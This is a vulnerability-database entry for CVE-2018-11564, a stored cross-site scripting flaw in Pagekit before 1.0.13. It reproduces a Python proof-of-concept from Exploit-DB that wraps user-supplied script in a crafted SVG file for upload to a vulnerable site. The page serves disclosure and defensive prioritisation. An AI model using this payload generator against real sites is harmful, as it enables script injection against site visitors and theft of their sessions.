CVE-2018-11564

unknown

Published 2022-05-14 · Modified 2024-04-24

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Pagekit Stored Cross-site Scripting

Predictions

Exploit likelihood

30%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-44837 webapps php text · 1 KB

DEEPIN2 · 2018-06-05

Pagekit < 1.0.13 - Cross-Site Scripting Code Generator

text exploit Source: Exploit-DB

# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
# Author : DEEPIN2
# Date: 2018-06-05
# Vendor: Pagekit
# Sotware: https://pagekit.com/
# Version: < 1.0.13
# CVE: 2018-11564
# python3 required

def makesvg(name, code):
	code = '<exploit:script xmlns:exploit="http://www.w3.org/1999/xhtml">' + code + '</exploit:script>'
	f = open(name, 'w+')
	f.write(code)
	f.close


if __name__ == '__main__':
	print('''
  ______     _______     ____   ___  _  ___        _ _ ____   __   _  _   
 / ___\ \   / / ____|   |___ \ / _ \/ |( _ )      / / | ___| / /_ | || |  
| |    \ \ / /|  _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_ 
| |___  \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__   _|
 \____|  \_/  |_____|   |_____|\___/|_|\___/      |_|_|____/ \___/   |_|  
	[*] Author : DEEPIN2(Junseo Lee)''')
	print('[*] enter name without extension, ex) test.svg -> test')
	filename = input('Filename : ') + '.svg'
	print('[*] If you want to use alert(), type "alert("bla..bla..")"')
	scriptcode = input('Script code : ')
	try:
		makesvg(filename, scriptcode)
		print('[+] Successfully make venom file "%s"' %filename)
	except Error as e:
		print(e)

Package impact

Ecosystem	Package	Vulnerable	Fixed
Packagist	pagekit/pagekit

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.